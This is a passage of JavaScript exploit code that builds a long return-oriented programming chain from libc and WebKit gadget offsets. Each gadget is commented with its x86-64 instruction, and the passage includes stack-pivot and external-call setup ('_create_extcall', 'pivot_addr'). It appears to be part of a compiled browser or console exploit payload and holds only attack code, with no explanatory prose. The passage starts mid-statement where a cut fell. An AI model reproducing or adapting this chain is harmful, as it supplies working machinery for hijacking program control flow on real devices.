4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+84160, //L456 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+84144, //L454 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L454: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L456: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+84304, //L459 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+84272, //L457 webkit_base+660161, //mov [rsi], rax ; mov al, 
1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+84288, //L458 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L457: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L458: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L459: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+84376, //L461 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L461: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+84432, //L462 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L462: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+84512, //L464 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L464: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L466: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+84632, //L469 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+84616, //L467 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L467: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L469: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+84808, //L472 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+84824, //L473 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+84776, //L470 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+84792, //L471 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L470: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L471: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L472: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L473: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+84936, //L474 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+84968, //L476 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+84952, //L475 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L474: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L475: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L476: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+85056, //L478 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L478: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+85112, //L479 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L479: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
libc_base+764760, //pop rsi ropchain+85184, //L482 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L482: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+85240, //L483 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L483: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L485: libc_base+764760, //pop rsi ropchain+85328, //L486 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L486: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L488: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+85448, //L491 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+85432, //L489 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L489: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L491: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+85624, //L494 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+85640, //L495 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+85592, //L492 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+85608, //L493 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L492: db([0, 0]); // 0x0 
set_gadget(webkit_base+3236123,); //pop r9 //L493: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L494: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L495: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+85736, //L497 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+85720, //L496 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L496: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L497: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+85824, //L499 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L498: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L499: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+85880, //L500 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L500: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L502: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+85960, //L504 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L504: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+74104, //L202 //L235: libc_base+764760, //pop rsi ropchain+86056, //L505 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop 
rcx ]); //L505: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L507: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+86176, //L510 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+86160, //L508 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L508: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L510: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+86288, //L511 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+86320, //L513 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+86304, //L512 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L511: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L512: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L513: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+86424, //L514 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+86440, //L515 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L514: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L515: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+86560, //L516 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+86544, //L517 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L517: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L516: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+86648, //L519 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+86632, //L518 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L518: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L519: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+86752, //L520 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+86768, //L521 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L520: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L521: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+86888, //L522 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+86872, //L523 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L523: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L522: db([0, 0]); // 0x0 //_create_extcall: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+86960, //L525 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 
webkit_base+568675 //pop r8 ]); //L525: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+87024, //L527 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L527: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L528: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L530: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+87192, //L533 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+87176, //L531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L531: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L533: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+87280, //L534 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+87296, //L536 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L534: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L536: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L537: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L539: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+87456, //L542 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+87440, //L540 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L540: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L542: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+87600, //L545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+87568, //L543 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+87584, //L544 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L543: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L544: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L545: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+87672, //L547 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L547: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+87728, //L548 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L548: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+87824, //L551 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L550: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L551: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L552: db([1, 0]); // 0x1 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+87920, //L553 webkit_base+660161, //mov [rsi], rax ; 
mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+87936, //L554 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L553: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L554: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+88024, //L556 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L556: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+88080, //L557 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L557: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+88184, //L559 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L559: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L561: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+88304, //L564 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+88288, //L562 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L562: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L564: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+88448, 
//L567 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+88416, //L565 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+88432, //L566 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L565: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L566: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L567: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+88520, //L569 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L569: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+88576, //L570 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L570: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+88672, //L573 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L572: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L573: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L574: db([0, 0]); // 0x0 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+88768, //L575 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+88784, //L576 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L575: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L576: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+88872, //L578 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L578: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+88928, //L579 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L579: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+89000, //L582 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L582: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+89056, //L583 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L583: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L585: pivot_addr, libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+89192, //L586 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L586: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L588: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+89312, //L591 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+89296, //L589 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L589: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L591: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+89456, //L594 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+89424, //L592 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+89440, //L593 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L592: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L593: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L594: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+89528, //L596 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L596: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+89584, //L597 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L597: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+89680, //L600 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L599: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L600: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L601: db([1, 0]); // 0x1 set_gadgets([ webkit_base+10973692, 
//imul rax, rcx libc_base+764760, //pop rsi ropchain+89776, //L602 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+89792, //L603 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L602: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L603: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+89880, //L605 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L605: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+89936, //L606 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L606: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+90008, //L609 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L609: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+90064, //L610 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L610: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+90152, //L612 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L612: db([0, 0]); 
